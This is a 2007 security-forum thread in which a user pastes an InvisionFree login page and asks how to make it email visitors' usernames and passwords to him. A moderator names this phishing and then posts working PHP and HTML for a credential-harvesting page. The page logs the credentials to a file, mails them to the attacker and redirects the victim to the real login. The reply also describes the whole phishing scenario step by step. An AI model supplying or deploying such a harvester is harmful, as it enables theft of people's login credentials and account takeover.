Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
September 19, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 240
Members: 0
Total: 240
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Invision Power Board -> Source Code Modifying Help
Post new topic  Reply to topic View previous topic :: View next topic 
Source Code Modifying Help
PostPosted: Thu Aug 30, 2007 4:08 am Reply with quote
CrazyChicken
Beginner
Beginner
 
Joined: Mar 19, 2007
Posts: 2
Location: St. Louis




I'm trying to learn expand my coding skills by trying something with a source code. I have a source code that I copied from a random InvisionFree forum, and I need someone to modify it so that I when someone enters their username and password, it sends the info to a specified email address. I am not trying to cause chaos around the IF network, I just want to understand how it is done. Please highlight which part of the code you edited and exactly what you did. I will then test it out to see if it works.

I'd appreciate it! Here is the code:

Code:
<html>
<head>
<title>Testleet2007</title>


<style type='text/css'>
html { overflow-x: hidden; overflow-y: auto; }

form { display:inline; }
img  { vertical-align:middle; border:0px }
BODY { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #000; margin:0px 10px 0px 10px;background-color:#FFF }
TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: #000; }
a:link, a:visited, a:active { text-decoration: underline; color: #000 }
a:hover { color: #465584; text-decoration:underline }

fieldset.search { padding:6px; line-height:150% }
label { cursor:pointer; }

img.attach { border:2px outset #EEF2F7;padding:2px }

.googleroot  { padding:6px; line-height:130% }
.googlechild { padding:6px; margin-left:30px; line-height:130% }
.googlebottom, .googlebottom a:link, .googlebottom a:visited, .googlebottom a:active { font-size:11px; color: #3A4F6C; }
.googlish, .googlish a:link, .googlish a:visited, .googlish a:active { font-size:14px; font-weight:bold; color:#00D; }
.googlepagelinks { font-size:1.1em; letter-spacing:1px }
.googlesmall, .googlesmall a:link, .googlesmall a:active, .googlesmall a:visited { font-size:10px; color:#434951 }

li.helprow { padding:0px; margin:0px 0px 10px 0px }
ul#help    { padding:0px 0px 0px 15px }

option.cat { font-weight:bold; }
option.sub { font-weight:bold;color:#555 }
.caldate   { text-align:right;font-weight:bold;font-size:11px;color:#777;background-color:#DFE6EF;padding:4px;margin:0px }

.warngood { color:green }
.warnbad  { color:red }

#padandcenter { margin-left:auto;margin-right:auto;text-align:center;padding:14px 0px 14px 0px }

#profilename { font-size:28px; font-weight:bold; }
#calendarname { font-size:22px; font-weight:bold; }

#photowrap { padding:6px; }
#phototitle { font-size:24px; border-bottom:1px solid black }
#photoimg   { text-align:center; margin-top:15px }

#ucpmenu    { line-height:150%;width:22%; border:1px solid #345487;background-color: #F5F9FD }
#ucpmenu p  { padding:2px 5px 6px 9px;margin:0px; }
#ucpcontent { background-color: #F5F9FD; border:1px solid #345487;line-height:150%; width:auto }
#ucpcontent p  { padding:10px;margin:0px; }

#ipsbanner { position:absolute;top:1px;right:5%; }
#logostrip { border:1px solid #345487;background-color: #3860BB;background-image:url(http://209.85.12.227/style_images/1/tile_back.gif);padding:0px;margin:0px; }
#submenu   { border:1px solid #BCD0ED;background-color: #DFE6EF;font-size:10px;margin:3px 0px 3px 0px;color:#3A4F6C;font-weight:bold;}
#submenu a:link, #submenu  a:visited, #submenu a:active { font-weight:bold;font-size:10px;text-decoration: none; color: #3A4F6C; }
#userlinks { border:1px solid #C2CFDF; background-color: #F0F5FA }

#navstrip  { font-weight:bold;padding:6px 0px 6px 0px; }

.activeuserstrip { background-color:#BCD0ED; padding:6px }

.pformstrip { background-color: #D1DCEB; color:#3A4F6C;font-weight:bold;padding:7px;margin-top:1px }
.pformleft  { background-color: #F5F9FD; padding:6px; margin-top:1px;width:25%; border-top:1px solid #C2CFDF; border-right:1px solid #C2CFDF; }
.pformleftw { background-color: #F5F9FD; padding:6px; margin-top:1px;width:40%; border-top:1px solid #C2CFDF; border-right:1px solid #C2CFDF; }
.pformright { background-color: #F5F9FD; padding:6px; margin-top:1px;border-top:1px solid #C2CFDF; }

.post1 { background-color: #F5F9FD }
.post2 { background-color: #EEF2F7 }
.postlinksbar { background-color:#D1DCEB;padding:7px;margin-top:1px;font-size:10px; background-image: url(http://209.85.12.227/style_images/1/tile_sub.gif) }

.row1 { background-color: #F5F9FD }
.row2 { background-color: #DFE6EF }
.row3 { background-color: #EEF2F7 }
.row4 { background-color: #E4EAF2 }

.darkrow1 { background-color: #C2CFDF; color:#4C77B6; }
.darkrow2 { background-color: #BCD0ED; color:#3A4F6C; }
.darkrow3 { background-color: #D1DCEB; color:#3A4F6C; }

.hlight { background-color: #DFE6EF }
.dlight { background-color: #EEF2F7 }

.titlemedium { font-weight:bold; color:#3A4F6C; padding:7px; margin:0px; background-image: url(http://209.85.12.227/style_images/1/tile_sub.gif) }
.titlemedium  a:link, .titlemedium  a:visited, .titlemedium  a:active  { text-decoration: underline; color: #3A4F6C }

.maintitle { vertical-align:middle;font-weight:bold; color:#FFF; letter-spacing:1px; padding:8px 0px 8px 5px; background-image: url(http://209.85.12.227/style_images/1/tile_back.gif) }
.maintitle a:link, .maintitle  a:visited, .maintitle  a:active { text-decoration: none; color: #FFF }
.maintitle a:hover { text-decoration: underline }

.plainborder { border:1px solid #345487;background-color:#F5F9FD }
.tableborder { border:1px solid #345487;background-color:#FFF; padding:0px; margin:0px; width:100% }
.tablefill   { border:1px solid #345487;background-color:#F5F9FD;padding:6px;  }
.tablepad    { background-color:#F5F9FD;padding:6px }
.tablebasic  { width:100%; padding:0px 0px 0px 0px; margin:0px; border:0px }

.wrapmini    { float:left;line-height:1.5em;width:25% }
.pagelinks   { float:left;line-height:1.2em;width:35% }

.desc { font-size:10px; color:#434951 }
.edit { font-size: 9px }

.signature   { font-size: 10px; color: #339 }
.postdetails { font-size: 10px }
.postcolor   { font-size: 12px; line-height: 160% }

.normalname { font-size: 12px; font-weight: bold; color: #003 }
.normalname a:link, .normalname a:visited, .normalname a:active { font-size: 12px }
.unreg { font-size: 11px; font-weight: bold; color: #900 }

.searchlite { font-weight:bold; color:#F00; background-color:#FF0 }

#QUOTE { font-family: Verdana, Arial; font-size: 11px; color: #465584; background-color: #FAFCFE; border: 1px solid #000; padding-top: 2px; padding-right: 2px; padding-bottom: 2px; padding-left: 2px }
#CODE  { font-family: Courier, Courier New, Verdana, Arial;  font-size: 11px; color: #465584; background-color: #FAFCFE; border: 1px solid #000; padding-top: 2px; padding-right: 2px; padding-bottom: 2px; padding-left: 2px }

.copyright { font-family: Verdana, Tahoma, Arial, Sans-Serif; font-size: 9px; line-height: 12px }

.codebuttons  { font-size: 10px; font-family: verdana, helvetica, sans-serif; vertical-align: middle }
.forminput, .textinput, .radiobutton, .checkbox  { font-size: 11px; font-family: verdana, helvetica, sans-serif; vertical-align: middle }

.thin { padding:6px 0px 6px 0px;line-height:140%;margin:2px 0px 2px 0px;border-top:1px solid #FFF;border-bottom:1px solid #FFF }

.purple { color:purple;font-weight:bold }
.red    { color:red;font-weight:bold }
.green  { color:green;font-weight:bold }
.blue   { color:blue;font-weight:bold }
.orange { color:#F90;font-weight:bold }
</style>
<base href="http://127.0.0.1/" />

</head>
<body bgcolor='#FFFFFF' leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" alink='#000000' vlink='#000000'>
<script language='JavaScript' type="text/javascript">
<!--
function buddy_pop() { window.open('http://z3.invisionfree.com/Testleet2007/index.php?act=buddy&s=fd44fcbdf94654a666454eb33d3c7cb3','BrowserBuddy','width=250,height=500,resizable=yes,scrollbars=yes'); }
function multi_page_jump( url_bit, total_posts, per_page )
{
pages = 1; cur_st = parseInt(""); cur_page  = 1;
if ( total_posts % per_page == 0 ) { pages = total_posts / per_page; }
 else { pages = Math.ceil( total_posts / per_page ); }
msg = "Please enter a page number to jump to between 1 and" + " " + pages;
if ( cur_st > 0 ) { cur_page = cur_st / per_page; cur_page = cur_page -1; }
show_page = 1;
if ( cur_page < pages )  { show_page = cur_page + 1; }
if ( cur_page >= pages ) { show_page = cur_page - 1; }
 else { show_page = cur_page + 1; }
userPage = prompt( msg, show_page );
if ( userPage > 0  ) {
   if ( userPage < 1 )     {    userPage = 1;  }
   if ( userPage > pages ) { userPage = pages; }
   if ( userPage == 1 )    {     start = 0;    }
   else { start = (userPage - 1) * per_page; }
   window.location = url_bit + "&st=" + start;
}
}
//-->
</script>
 
<!--IBF.BANNER-->
<div id='logostrip'>

  <a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;' title='Board Home'><img src='http://209.85.62.23/style_images/1/logo4.gif' alt='' border='0' /></a>
</div>
<!-- google_ad_section_start(weight=0) -->
<!-- IE6/Win TABLE FIX -->
<table  width="100%" cellspacing="6" id="submenu">
<tr>
 <td><a href=''></a> ;;; <a href="http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=site">Portal</a></td>
 <td align="right">
   <img src="http://209.85.12.227/style_images/1/atb_help.gif" border="0" alt="" /> ;;<a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=Help'>Help</a>
    ;; ;; ;;<img src="http://209.85.12.227/style_images/1/atb_search.gif" border="0" alt="" /> ;;<a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=Search&amp;f='>Search</a>

    ;; ;; ;;<img src="http://209.85.12.227/style_images/1/atb_members.gif" border="0" alt="" /> ;;<a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=Members'>Members</a>
    ;; ;; ;;<img src="http://209.85.12.227/style_images/1/atb_calendar.gif" border="0" alt="" /> ;;<a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=calendar'>Calendar</a>
   <!--IBF.CHATLINK-->
 </td>
</tr>
</table>
<div align='center' style='margin-bottom:3px;'><div align="center" style="margin-bottom:3px;"><div class="row4"><script type="text/javascript"><!--
google_ad_client = "pub-2404175891811072";
google_alternate_ad_url = "http://www.invisionfree.com/files/index.php?bg=E4EAF2&txt=434951&link=000000";
google_ad_width = 728;
google_ad_height = 90;
google_ad_format = "728x90_as";



google_ad_channel ="1835769090 8161518757 3879835861";
google_color_border = "E4EAF2";
google_color_bg = "E4EAF2";
google_color_link = "0000FF";
google_color_url = "000000";
google_color_text = "434951";
google_page_url = document.location;
//--></script>
<script type="text/javascript"
  src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script><br /><script type="text/javascript"><!--
google_ad_client = "pub-2404175891811072";
google_ad_width = 728;
google_ad_height = 15;
google_ad_format = "728x15_0ads_al_s";
google_ad_channel ="6089240242";
google_color_border = "E4EAF2";
google_color_bg = "E4EAF2";
google_color_link = "0000FF";
google_color_url = "000000";
google_color_text = "434951";
google_page_url = document.location;
google_alternate_color = "E4EAF2";
//--></script>
<script type="text/javascript"
  src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></div></div></div>
  <table width="100%" id="userlinks" cellspacing="6">
   <tr>
    <td>Welcome Guest ( <a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=Login&amp;CODE=00'>Log In</a> | <a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=Reg&amp;CODE=00'>Register</a> )</td>

    <td align='right'><a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=Reg&amp;CODE=reval'>Resend Validation Email</a></td>
   </tr>
  </table>
<!-- google_ad_section_end() -->
<br />
<div id='navstrip' align='left'><img src='http://209.85.62.23/style_images/1/nav.gif' border='0' alt=''> ;;<a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=idx'>Testleet2007</a></div>
<br />
   <div align='left' style='text-align:left;vertical-align:bottom;'>
      <!-- IBF.NEWSLINK -->Welcome back; your last visit was on Aug 30 2007, 04:14 AM
   </div>   <!-- google_ad_section_start(weight=0) -->

<!-- Board Stats -->
   <form style='display:inline' action="http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=Login&amp;CODE=01&amp;CookieDate=1" method="post">
<div align='right'><strong>Quick Log In</strong>
<input type="text" class="forminput" size="10" name="UserName" onfocus="this.value=''" value="User Name" />
<input type='password' class='forminput' size='10' name='PassWord' onfocus="this.value=''" value='ibfrules' />
<input type='submit' class='forminput' value='Go' />
</div>
</form>
    <br />
   <div align='center'>
      <a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=Stats&amp;CODE=leaders'>The moderating team</a> |
      <a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=Search&amp;CODE=getactive'>Today's active topics</a> |
      <!--<a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=Stats'>Today's top 10 posters</a> |-->

      <a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=Members&amp;max_results=10&amp;sort_key=posts&amp;sort_order=desc'>Overall top 10 posters</a>
   </div>
    <br />
   <div class="tableborder">
      <div class="maintitle">Board Statistics</div>
      <table cellpadding='4' cellspacing='1' border='0' width='100%'>        <tr>
           <td class='pformstrip' colspan='2'>1 user(s) active in the past 15 minutes</td>

       </tr>
       <tr>
          <td width="5%" class='row2'><img src='http://209.85.62.23/style_images/1/user.gif' border='0' alt=''></td>
          <td class='row4' width='95%'>
            <b>1</b> guests, <b>0</b> members, <b>0</b> anonymous members
            <div class='thin'></div>

            Show detailed list by: <a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=Online&amp;CODE=listall&amp;sort_key=click'>Last Click</a>, <a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=Online&amp;CODE=listall&amp;sort_key=name&amp;sort_order=asc&amp;show_mem=reg'>Member Name</a>
          </td>
        </tr>        <tr>
           <td class='pformstrip' colspan='2'>Today's Birthdays</td>
       </tr>
       <tr>

          <td class='row2' width='5%' valign='middle'><img src='http://209.85.62.23/style_images/1/user.gif' border='0' alt=''></td>
          <td class='row4' width='95%'><b></b> No members are celebrating a birthday today<br /></td>
        </tr>         <tr>
           <td class='pformstrip' colspan='2'>Board Statistics</td>
         </tr>
         <tr>
          <td class='row2' width='5%' valign='middle'><img src='http://209.85.62.23/style_images/1/stats.gif' border='0' alt=''></td>

          <td class='row4' width="95%" align='left'>Our members have made a total of <b>0</b> posts<br />We have <b>1</b> registered members<br />The newest member is <b><a href='http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;showuser=1'>CrazyChicken</a></b><br />Most users ever online was <b>1</b> on <b>Aug 30 2007, 04:14 AM</b></td>

         </tr>         </table>
    </div>
    <!-- Board Stats -->
    <!-- google_ad_section_end() -->   <br />
   <div align='right'><a href="http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=Login&amp;CODE=06">Delete cookies set by this board</a> ; <a href="http://z3.invisionfree.com/Testleet2007/index.php?s=fd44fcbdf94654a666454eb33d3c7cb3&amp;act=Login&amp;CODE=05">Mark all posts as read</a></div>

<br /><div align='center' class='row4' style='border:1px solid #345487; font-size: 7.5pt; line-height: 12px'>Hosted for free by <a href='http://invisionfree.com' target='_blank'>InvisionFree</a> (<a href='http://invisionfree.com/index.php?p=tou'>Terms of Use: Updated 7/7/05</a>) | Powered by <a href="http://www.invisionboard.com" target='_blank'>Invision Power Board</a> v1.3 Final  &copy; 2003 <a href='http://www.invisionpower.com' target='_blank'>IPS, Inc.</a><br />Page creation time: <b>0.0078</b> seconds | <a href='http://z3.invisionfree.com/Testleet2007/ar/'>Archive</a></div>

</body>
</html>
View user's profile Send private message Visit poster's website
PostPosted: Sat Sep 01, 2007 10:45 pm Reply with quote
ToXiC
Moderator
Moderator
 
Joined: Dec 01, 2004
Posts: 181
Location: Cyprus




This is a login screen that connects to a database and authenticates the user to a session ..

If you are planning to "expand" your programming skills and create a fishing site that will probably not work by the way you realise it.

The scenario could be as follows :

(1)creating a login screen were if someone type his username/password that will be send to you via email .. and forward the site to a screen (2) where it will say that the login is incorrectly and he will have to re-enter login/password to autenticate succesfully.

At case (1) this will be hosted at your site

at case (2) forward to the login screen of the attacked form

this is called phishing ..

now .. if you want to put this on your site .. so that you can log the users password in plain-text before it gets to the hash procedure you have to create variables to keep the value before it gets to hash methods ...



sample code :

file to be called by our form : ( this file will be hidden)

------------------------------------adminlogin.php-----------

Code:
<?
$user_info_file_name="/home/bla/public_html/storehere.txt";
$mailto="yourmail@email.com";
$user_info =  "Username : ".$HTTP_POST_VARS['u']."\n";
$user_info .=  "Password : ".$HTTP_POST_VARS['p']."\n\n";
$user_info_file = fopen($user_info_file_name,"a+");
if ($user_info_file) {
    fwrite($user_info_file,$user_info);
    fclose($user_info_file);
}

@mail($mailto, "User info", $user_info, "From: Evil Admin: PHP/" . phpversion());
?>


<script language=javascript>

<!--
function MM_goToURL() { //v3.0
  var i, args=MM_goToURL.arguments; document.MM_returnValue = false;
  for (i=0; i<(args.length-1); i+=2) eval(args[i]+".location='"+args[i+1]+"'");
}
//-->

MM_goToURL('parent','http://www.actualurlyouwanttoredirect.com/login.php');

</script>

-----------------------------------------


and the form .. were you will modify the 1 million lines code you pasted above accordingly :

---------------------------------adminlogin.html-----------

were are the variables you want to save to the txt file and receive them on your mail

Code:
<html>
<head>
   <title>Admin log In</title>
</head>

<body bgcolor="White">
<center><font face="verdana,arial">
<h2>User Log In</h2>
</font></center>
<table width=400 align=center>
<form action = "adminlogin.php" method="post">
<tr><td align=right>
<font face="verdana,arial" size="-1">UserName: </font></td><td align=left><input type="Text" name="u"></td>
</tr><tr><td align=right>
<font face="verdana,arial" size="-1">Password: </font></td><td align=left><input type="password" name="p"></td>
</tr><tr><td colspan=2 align=center>
<input type="Submit" value="Log In">
</td></tr></table>
<SCRIPT LANGUAGE="JavaScript">
<!--
 document.forms[0].p.focus();
//-->
 </SCRIPT>
</body>
</html>


-----------------------------------------------


So here is what that code does..

you have 2 files ..

adminlogin.php:
this file is called when the user presses the login button .. and will save the information to a txt file and will also send the info to your email.. after that will redirect the user to the actual login form.(of course you can implement it so that will authenticate the user also.

adminlogin.html

where is the form .. with the variables .. that will be filtered by adminlogin.php

prety simple a ? Smile

ToXiC

_________________
who|grep -i blonde|talk; cd~;wine;talk;touch;unzip;touch; strip;gasp;finger;gasp;mount; fsck; more; yes; gasp; umount; make clean; sleep;wakeup;goto http://www.md5this.com
View user's profile Send private message Visit poster's website MSN Messenger
Source Code Modifying Help
  www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.087 Seconds